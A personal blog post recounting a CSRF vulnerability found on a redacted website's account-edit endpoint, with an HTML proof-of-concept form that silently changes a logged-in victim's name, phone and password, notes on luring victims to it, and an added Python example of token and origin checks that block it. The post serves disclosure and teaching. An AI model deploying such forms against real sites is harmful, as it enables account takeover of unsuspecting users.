Story of a Basic CSRF Vulnerability

Adeyefa Oluwatoba
2 min read · Apr 23, 2021
cross site request forgery

This article is about a simple CSRF vulnerability I found. I am going to discuss how I found it and share my POC. Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. With a CSRF vulnerability an attacker can force an authenticated victim to perform sensitive actions, such as editing account details or transferring money, without their consent.

For the purpose of this article I am going to refer to the website I found the vulnerability on as redacted. I randomly chose to hack on redacted.com one evening. While browsing through the site and checking the requests in Burp Suite, I noticed a request that did not carry a CSRF token like the other requests did, so I decided to investigate further.

[Image: request without CSRF token]

As you can see in the request above, there is no CSRF token. The request can be used to edit profile details such as name, email, phone number and password. I immediately created a simple POC to confirm that the request was vulnerable.

<html>
<head>
<title>CSRF POC</title>
</head>
<body>
CSRF POC
<!-- the fields mirror the unprotected /account/save request seen in Burp Suite -->
<form method="POST" action="https://redacted.com/account/save">
<input value="You have been hacked" name="lname" type="text">
<input value="You have been hacked" name="fname" type="text">
<input value="YouHaveBeenPwned" name="password" type="text">
<input value="YouHaveBeenPwned" name="password_confirm" type="text">
<input value="800000000" name="phone" type="number">
<input type="submit">
</form>
</body>
</html>

Save the code above in a file with an .html extension and open it in a browser. In a typical attack the attacker hosts the POC above on a website and tricks the victim into opening it. Once the page is opened by an authenticated victim, the request to edit the account details is sent without their consent, because the browser attaches the victim's session cookies to it. With the POC above I was able to confirm that the request was vulnerable to CSRF attacks: the authentication cookies were not protected from being sent cross-site, and no other means of defending against CSRF (such as a token) was employed for the request. You can modify the POC above as required when testing for CSRF.
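What a server-side check that would have rejected this POC looks like, as an added Python example that is not part of the original article: a per-session synchronizer token compared in constant time, plus an Origin/Referer check as defense in depth. `redacted.com` is the article's placeholder host and the request dictionaries are constructed samples.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_HOST = "redacted.com"  # the application's own host (article placeholder)


def issue_token(session):
    """Create a per-session synchronizer token and keep it server-side."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def source_matches_site(headers):
    """Accept only requests whose Origin (or, failing that, Referer) is ours.
    A request with neither header is treated as cross-site, so a plain
    'Origin: null' or a stripped Referer does not slip through."""
    lower = {k.lower(): v for k, v in headers.items()}
    source = lower.get("origin") or lower.get("referer")
    if not source:
        return False
    return urlsplit(source).hostname == SITE_HOST


def is_legitimate_request(headers, form, session):
    """Reject any state-changing request that lacks the session's token."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False
    return source_matches_site(headers)


def demo():
    """Replay the article's POC fields against the check (constructed data)."""
    session = {}
    token = issue_token(session)
    poc_form = {"lname": "You have been hacked", "fname": "You have been hacked",
                "password": "YouHaveBeenPwned", "password_confirm": "YouHaveBeenPwned",
                "phone": "800000000"}
    forged_headers = {"Origin": "https://attacker.example"}  # attacker's page
    legit_headers = {"Origin": "https://redacted.com"}        # the site's own form
    legit_form = dict(poc_form, csrf_token=token)
    return {
        "forged_poc": is_legitimate_request(forged_headers, poc_form, session),
        "legit": is_legitimate_request(legit_headers, legit_form, session),
        "token_but_cross_site": is_legitimate_request(forged_headers, legit_form, session),
    }
```

The first result is the POC above being rejected for lack of a token; the third shows the origin check still refusing a cross-site submission even when a token is present.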

I have submitted the vulnerability to the website and it has been fixed now. Looks like there are still a lot of basic bugs in the wild to find.


Adeyefa Oluwatoba

Full Stack web developer. I love learning new things, open to new opportunities and experiences.